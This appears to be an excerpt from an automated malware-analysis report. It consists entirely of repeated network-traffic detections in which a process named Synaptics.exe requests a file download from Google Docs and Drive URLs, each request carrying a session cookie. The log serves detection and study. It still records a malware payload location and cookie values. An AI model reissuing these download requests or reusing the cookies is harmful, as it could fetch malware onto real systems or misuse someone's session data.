                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                      Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
